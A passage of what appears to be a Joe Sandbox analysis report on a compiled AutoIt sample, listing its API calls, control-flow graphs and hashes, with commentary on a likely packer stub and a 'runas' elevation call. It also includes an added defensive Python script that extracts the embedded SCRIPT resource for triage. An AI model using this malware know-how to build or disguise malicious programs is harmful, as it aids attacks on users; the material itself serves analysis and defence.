207 API calls 98686->98689 98711 88ed9d messages 98686->98711 98717 8f1155 22 API calls 98687->98717 98709 88ec76 messages 98689->98709 98690 89fddb 22 API calls 98690->98709 98691 88fef7 98697 88a8c7 22 API calls 98691->98697 98691->98711 98694 8d4600 98700 88a8c7 22 API calls 98694->98700 98694->98711 98695 8d4b0b 98719 8f359c 82 API calls __wsopen_s 98695->98719 98696 88a8c7 22 API calls 98696->98709 98697->98711 98700->98711 98702 8a0242 RtlEnterCriticalSection RtlLeaveCriticalSection RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 98702->98709 98703 88fbe3 98706 8d4bdc 98703->98706 98703->98711 98712 88f3ae messages 98703->98712 98704 88a961 22 API calls 98704->98709 98705 8a00a3 29 API calls pre_c_initialization 98705->98709 98720 8f359c 82 API calls __wsopen_s 98706->98720 98708 8d4beb 98721 8f359c 82 API calls __wsopen_s 98708->98721 98709->98690 98709->98691 98709->98694 98709->98695 98709->98696 98709->98702 98709->98703 98709->98704 98709->98705 98709->98708 98710 8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98709->98710 98709->98711 98709->98712 98713 8901e0 207 API calls 2 library calls 98709->98713 98714 8906a0 41 API calls messages 98709->98714 98710->98709 98712->98711 98718 8f359c 82 API calls __wsopen_s 98712->98718 98713->98709 98714->98709 98715->98682 98716->98687 98717->98711 98718->98711 98719->98711 98720->98708 98721->98711 98722 881033 98727 884c91 98722->98727 98726 881042 98728 88a961 22 API calls 98727->98728 98729 884cff 98728->98729 98735 883af0 98729->98735 98732 884d9c 98733 881038 98732->98733 98738 8851f7 22 API calls __fread_nolock 98732->98738 98734 8a00a3 29 API calls __onexit 98733->98734 98734->98726 98739 883b1c 98735->98739 98738->98732 98740 883b0f 98739->98740 98741 883b29 98739->98741 98740->98732 98741->98740 98742 883b30 RegOpenKeyExW 98741->98742 98742->98740 98743 883b4a RegQueryValueExW 98742->98743 98744 883b6b 98743->98744 98745 883b80 
                                      (Control-flow graph edge listing, rendered as a graph in the original report and not reproduced here. The functions it covers: the AutoIt include-path lookup starting at 0x88344d (GetFullPathNameW via 0x883357, RegOpenKeyExW at 0x883556, two RegQueryValueExW calls, RegCloseKey, _wcslen); a routine at 0x881056 that reaches the CRT __onexit handler at 0x8a00a3; a window procedure at 0x883170 (NtdllDefWindowProc_W, KillTimer, SetTimer, RegisterClipboardFormatW, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, PostQuitMessage); a routine at 0x882e37 whose callees include 0x884ecb (94 API calls) and 0x8f2cf9 (80 API calls); a helper at 0x884ae3; and a short stub at 0x9e1740 that loops over LoadLibraryA and GetProcAddress, calls VirtualProtect twice on another branch and reaches ExitProcess from the GetProcAddress path. The 0x9e1740 stub lies in the 0x9E1000 region listed under Memory Dump Source below, well outside the 0x881000 code region; a LoadLibraryA/GetProcAddress/VirtualProtect loop at such an address is the shape of a packer's import-resolution stub, although the report does not itself label it as one.)

                                      Control-flow Graph

                                      (Rendered graph for the function at 0x8842de; the edge listing and the executed/not-executed colouring are not reproduced here. The path it shows: GetVersionExW, then GetCurrentProcess and IsWow64Process, then either LoadLibraryA("kernel32.dll") followed by GetProcAddress("GetNativeSystemInfo"), calling GetNativeSystemInfo when the export resolves and FreeLibrary afterwards, or GetSystemInfo as the fallback. Resolving GetNativeSystemInfo dynamically is the portable way for a 32-bit process to read the real processor architecture under WOW64; the addresses are consistent with the AutoIt runtime rather than the embedded script.)
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0088430D
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • GetCurrentProcess.KERNEL32(?,0091CB64,00000000,?,?), ref: 00884422
                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00884429
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00884454
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884466
                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00884474
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0088447B
                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 008844A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                      • API String ID: 3290436268-3101561225
                                      • Opcode ID: c4acd4f7d082d35fd173a2880fdb086b50e6836d625edce6133a5e7f7e592a54
                                      • Instruction ID: c60c7a29d59642046ac10e4b8a27d1e7bd921e529f99146a81c5dc1ee721f27f
                                      • Opcode Fuzzy Hash: c4acd4f7d082d35fd173a2880fdb086b50e6836d625edce6133a5e7f7e592a54
                                      • Instruction Fuzzy Hash: 56A1A26293E3C4DFC711E76BBC617957FA4BF3634AB0898ADE041D3A21D2304949EB25

                                      Control-flow Graph

                                      (Rendered graph for the window procedure at 0x883170; edge listing and colouring not reproduced. It dispatches on the message: the default path is NtdllDefWindowProc_W; one path calls KillTimer, Shell_NotifyIconW (via 0x8830f2) and DeleteObject/DestroyWindow (via 0x883c50); one calls SetTimer (timer id 1, 0x2EE = 750 ms), RegisterClipboardFormatW("TaskbarCreated") and CreatePopupMenu; others call MoveWindow, SetFocus or PostQuitMessage. TaskbarCreated is the message Explorer broadcasts when the taskbar is recreated, which tray-icon applications handle by re-adding their icon; together with the "AutoIt v3" window class below this is consistent with the AutoIt runtime's tray window rather than with payload-specific behaviour.)
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0088316A,?,?), ref: 008831D8
                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0088316A,?,?), ref: 00883204
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00883227
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00883232
                                      • CreatePopupMenu.USER32 ref: 00883246
                                      • PostQuitMessage.USER32(00000000), ref: 00883267
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                      • String ID: TaskbarCreated
                                      • API String ID: 157504867-2362178303
                                      • Opcode ID: fcefe304f750e9f5e0d8ba058feea92b5800107fccc5fddb78e04eb33b2528d5
                                      • Instruction ID: bc6a3ee169db6775082a526c2adeddc5f9a0124885637c58f5a91dfb7f614a70
                                      • Opcode Fuzzy Hash: fcefe304f750e9f5e0d8ba058feea92b5800107fccc5fddb78e04eb33b2528d5
                                      • Instruction Fuzzy Hash: 15412735258308A7DB257B78AC1DBBD3A69F705F06F044125F902C52E2CBB09A40E762

                                      Control-flow Graph

                                      (Rendered graph for the function at 0x8842a2; edge listing and colouring not reproduced. CreateStreamOnHGlobal, then FindResourceExW; when the resource is found, LoadResource, SizeofResource and LockResource in turn, with every failure branching to the common exit at 0x8842d9.)
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008842B2
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008850AA,?,?,00000000,00000000), ref: 008842C9
                                      • LoadResource.KERNEL32(?,00000000,?,?,008850AA,?,?,00000000,00000000,?,?,?,?,?,?,00884F20), ref: 008C35BE
                                      • SizeofResource.KERNEL32(?,00000000,?,?,008850AA,?,?,00000000,00000000,?,?,?,?,?,?,00884F20), ref: 008C35D3
                                      • LockResource.KERNEL32(008850AA,?,?,008850AA,?,?,00000000,00000000,?,?,?,?,?,?,00884F20,?), ref: 008C35E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: 5158cd7bd6dba36957cf76ffc89763180ce4e7852ea8650f1f6663fa87c67b49
                                      • Instruction ID: 0f6b70d8adbd806d4d2808e26776a23d8bde5604fca422951474a8d8932bea12
                                      • Opcode Fuzzy Hash: 5158cd7bd6dba36957cf76ffc89763180ce4e7852ea8650f1f6663fa87c67b49
                                      • Instruction Fuzzy Hash: 4011ACB1344305BFD7219B65DC48F677BB9FBC9B55F108569B412C6250DBB2D800D620
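                                      The FindResourceExW(?, 0000000A, SCRIPT, 00000000) call above is the AutoIt runtime locating its embedded compiled script: type 0xA is RT_RCDATA and the resource is named SCRIPT, which is the basis for the "Binary is likely a compiled AutoIt script file" signature. For triage the same lookup can be reproduced offline against the file on disk. The Python below is an added example, not code from the report, from Joe Sandbox or from the sample; it walks the PE resource directory by hand (type, then name, then language) the way FindResourceExW does, exposes the lookup as functions, and ships a builder for a constructed one-resource .rsrc section so it can be exercised without the sample. The 16-byte AUTOIT_MAGIC marker is the one commonly used in YARA rules for compiled AutoIt v3 scripts and is an assumption here; the report page does not quote it.

```python
"""Offline equivalent of FindResourceExW(hModule, RT_RCDATA, L"SCRIPT", 0).
Added triage example, not taken from the report or the sample."""
import struct
import sys
from typing import Optional

RT_RCDATA = 10          # the 0000000A type argument in the report
_SUBDIR = 0x80000000    # high bit: key is a name string / target is a subdirectory
_MASK = 0x7FFFFFFF
# Assumption: leading bytes of a compiled AutoIt3 script blob as used in common
# YARA rules; not quoted on the report page.
AUTOIT_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


def _name_at(rsrc: bytes, off: int) -> str:
    # IMAGE_RESOURCE_DIR_STRING_U: u16 length in UTF-16 code units, then the chars
    (n,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * n].decode("utf-16-le")


def _entries(rsrc: bytes, dir_off: int):
    # IMAGE_RESOURCE_DIRECTORY: 12 header bytes, NumberOfNamedEntries, NumberOfIdEntries,
    # then 8-byte entries. Malformed directories raise struct.error, fine for triage.
    named, ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + ids):
        key, target = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        name = _name_at(rsrc, key & _MASK) if key & _SUBDIR else key
        yield name, target & _MASK, bool(target & _SUBDIR)


def find_resource(rsrc: bytes, rsrc_rva: int, rtype, name, lang=None) -> Optional[bytes]:
    """Bytes of resource (rtype, name[, lang]) from a raw .rsrc section, or None.
    rsrc_rva is the section's VirtualAddress: IMAGE_RESOURCE_DATA_ENTRY.OffsetToData
    is an RVA and must be rebased to a section offset before slicing."""
    def same(key, want):  # names compare case-insensitively, integer ids exactly
        if isinstance(key, str) and isinstance(want, str):
            return key.upper() == want.upper()
        return key == want

    for tkey, toff, tsub in _entries(rsrc, 0):
        if not (tsub and same(tkey, rtype)):
            continue
        for nkey, noff, nsub in _entries(rsrc, toff):
            if not (nsub and same(nkey, name)):
                continue
            for lkey, loff, lsub in _entries(rsrc, noff):
                if lsub or (lang is not None and lkey != lang):
                    continue
                data_rva, size = struct.unpack_from("<II", rsrc, loff)
                start = data_rva - rsrc_rva
                if start < 0 or start + size > len(rsrc):
                    return None  # malformed or packed: data lies outside this section
                return rsrc[start:start + size]
    return None


def extract_autoit_script(rsrc: bytes, rsrc_rva: int) -> Optional[bytes]:
    """The lookup this sample performs; lang=None takes the first language entry."""
    return find_resource(rsrc, rsrc_rva, RT_RCDATA, "SCRIPT")


def is_autoit_compiled_script(blob: Optional[bytes]) -> bool:
    return blob is not None and blob.startswith(AUTOIT_MAGIC)


def rsrc_section(pe: bytes):
    """Minimal PE header walk returning (.rsrc raw bytes, .rsrc RVA)."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    (nsec,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    for i in range(nsec):
        hdr = table + 40 * i  # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        _vsize, rva, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if pe[hdr:hdr + 8].rstrip(b"\0") == b".rsrc":
            return pe[raw_ptr:raw_ptr + raw_size], rva
    raise ValueError("no .rsrc section")


def extract_from_pe(pe: bytes) -> Optional[bytes]:
    return extract_autoit_script(*rsrc_section(pe))


def build_sample_rsrc(script: bytes, rsrc_rva: int = 0x1000) -> bytes:
    """Constructed test input (not from the sample): a .rsrc section holding one
    resource, RT_RCDATA / "SCRIPT" / language 0, at fixed offsets."""
    def directory(entries):
        named = sum(1 for k, _ in entries if k & _SUBDIR)
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
        return hdr + b"".join(struct.pack("<II", k, v) for k, v in entries)

    type_dir, name_dir, name_str, data_entry, data = 0x18, 0x30, 0x48, 0x58, 0x68
    out = directory([(RT_RCDATA, _SUBDIR | type_dir)])                    # root   0x00
    out += directory([(_SUBDIR | name_str, _SUBDIR | name_dir)])           # type   0x18
    out += directory([(0, data_entry)])                                     # name   0x30
    out += struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le") + b"\0\0"   # string 0x48
    out += struct.pack("<IIII", rsrc_rva + data, len(script), 0, 0)        # entry  0x58
    return out + script


SAMPLE_SCRIPT = AUTOIT_MAGIC + b"constructed script body"  # constructed, not the sample's
SAMPLE_RSRC = build_sample_rsrc(SAMPLE_SCRIPT, 0x1000)

if __name__ == "__main__":
    blob = extract_from_pe(open(sys.argv[1], "rb").read())
    print("SCRIPT resource:", None if blob is None else f"{len(blob)} bytes, "
          f"AutoIt marker {'present' if is_autoit_compiled_script(blob) else 'absent'}")
```

                                      Run it as `python extract_script.py SAL987656700.exe`; a blob that starts with the marker can be handed to any AutoIt decompiler. If the file on disk is packed, the .rsrc section there may not be the one the runtime sees, in which case extract from a memory dump taken after unpacking instead. The lookup returns None rather than slicing out of bounds when a data entry points outside the section, which is the usual symptom of a packed or hand-edited resource tree.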

                                      Control-flow Graph

                                      APIs
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00882B6B
                                        • Part of subcall function 00883A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00951418,?,00882E7F,?,?,?,00000000), ref: 00883A78
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00942224), ref: 008C2C10
                                      • ShellExecuteW.SHELL32(00000000,?,?,00942224), ref: 008C2C17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                      • String ID: runas
                                      • API String ID: 448630720-4000483414
                                      • Opcode ID: 876353eed4db4e153b253f35f7a34f79d69bdf42cfc9e158d59069159364af52
                                      • Instruction ID: dc1fb6bd80b61490537ea2a46cea31fd0e3106122316bf3dc148349d8cf0aeb1
                                      • Opcode Fuzzy Hash: 876353eed4db4e153b253f35f7a34f79d69bdf42cfc9e158d59069159364af52
                                      • Instruction Fuzzy Hash: 9C11BE31208305AAC715FF68E852EBEB7A4FB95765F48142DF082D21E2CF218A4AD713
                                      APIs
                                      • GetInputState.USER32 ref: 0088D807
                                      • timeGetTime.WINMM ref: 0088DA07
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0088DB28
                                      • TranslateMessage.USER32(?), ref: 0088DB7B
                                      • DispatchMessageW.USER32(?), ref: 0088DB89
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0088DB9F
                                      • Sleep.KERNEL32(0000000A), ref: 0088DBB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                      • String ID:
                                      • API String ID: 2189390790-0
                                      • Opcode ID: cc1526333c3f7a0b411bef57c6e05a12db64f1685d74dc882aea9d7158d2708a
                                      • Instruction ID: 8ae5821de2cc025083bd6dd2497f3bdbb7dc5a47bd24ee16d586ea4699358ac4
                                      • Opcode Fuzzy Hash: cc1526333c3f7a0b411bef57c6e05a12db64f1685d74dc882aea9d7158d2708a
                                      • Instruction Fuzzy Hash: EF42EF70608345EFDB28EF28C844BAABBE1FF96314F14865AE495C7391D770E844DB92

                                      Control-flow Graph

                                      (Rendered graph for the CRT file-open routine at 0x8c065b; edge listing and colouring not reproduced. It calls 0x8c039a (CreateFileW), checks the returned handle with GetFileType, and on each failure path maps GetLastError through __dosmaperr and closes the handle; a second CloseHandle/GetLastError/__dosmaperr path follows the later 0x8c039a call at 0x8c08fc.)
                                      APIs
                                        • Part of subcall function 008C039A: CreateFileW.KERNELBASE(00000000,00000000,?,008C0704,?,?,00000000,?,008C0704,00000000,0000000C), ref: 008C03B7
                                      • GetLastError.KERNEL32 ref: 008C076F
                                      • __dosmaperr.LIBCMT ref: 008C0776
                                      • GetFileType.KERNELBASE(00000000), ref: 008C0782
                                      • GetLastError.KERNEL32 ref: 008C078C
                                      • __dosmaperr.LIBCMT ref: 008C0795
                                      • CloseHandle.KERNEL32(00000000), ref: 008C07B5
                                      • CloseHandle.KERNEL32(?), ref: 008C08FF
                                      • GetLastError.KERNEL32 ref: 008C0931
                                      • __dosmaperr.LIBCMT ref: 008C0938
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: a4ca73ce52290f3eaf8f7840d7306f6e38f74663e7a883f787736691f1946e8c
                                      • Instruction ID: bfe13d1c4eca2de7f6b11fac5cfed073e40d9628dd19359993c5b3e9c8141c39
                                      • Opcode Fuzzy Hash: a4ca73ce52290f3eaf8f7840d7306f6e38f74663e7a883f787736691f1946e8c
                                      • Instruction Fuzzy Hash: 74A10132A142088FDF19AFA8D851BAE3BB0FB4A364F14415DF811DB292D731D912DF92

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00883A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00951418,?,00882E7F,?,?,?,00000000), ref: 00883A78
                                        • Part of subcall function 00883357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00883379
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0088356A
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008C318D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008C31CE
                                      • RegCloseKey.ADVAPI32(?), ref: 008C3210
                                      • _wcslen.LIBCMT ref: 008C3277
                                      • _wcslen.LIBCMT ref: 008C3286
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                      • API String ID: 98802146-2727554177
                                      • Opcode ID: 6009649127df3b2a24f4005d9f9a8a0094f1637daee57f0ec2d8106fc343dbcb
                                      • Instruction ID: ef878ea75e2d1aed095ce3e340f9f286a2faed59e060869f9b955bb7923d6416
                                      • Opcode Fuzzy Hash: 6009649127df3b2a24f4005d9f9a8a0094f1637daee57f0ec2d8106fc343dbcb
                                      • Instruction Fuzzy Hash: 3D717F715183019EC714EF6AEC819ABBBE8FF86B41F40442EF545D71A0EB30DA49DB52

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00882B8E
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00882B9D
                                      • LoadIconW.USER32(00000063), ref: 00882BB3
                                      • LoadIconW.USER32(000000A4), ref: 00882BC5
                                      • LoadIconW.USER32(000000A2), ref: 00882BD7
                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00882BEF
                                      • RegisterClassExW.USER32(?), ref: 00882C40
                                        • Part of subcall function 00882CD4: GetSysColorBrush.USER32(0000000F), ref: 00882D07
                                        • Part of subcall function 00882CD4: RegisterClassExW.USER32(00000030), ref: 00882D31
                                        • Part of subcall function 00882CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00882D42
                                        • Part of subcall function 00882CD4: LoadIconW.USER32(000000A9), ref: 00882D85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 2880975755-4155596026
                                      • Opcode ID: eb55fb7a55786c3bf3fc5813622340c88480822fbadde941128e4f0ffc60b175
                                      • Instruction ID: af5270951c1c09eb049e6fc5a1dc2a938bf28d465a5477b909df4a8d6858e11a
                                      • Opcode Fuzzy Hash: eb55fb7a55786c3bf3fc5813622340c88480822fbadde941128e4f0ffc60b175
                                      • Instruction Fuzzy Hash: A1216FB4E68318AFDB109FA6EC65BED7FB4FB08B51F00415AF500A66A0D3B10940EF90

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00882D07
                                      • RegisterClassExW.USER32(00000030), ref: 00882D31
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00882D42
                                      • LoadIconW.USER32(000000A9), ref: 00882D85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
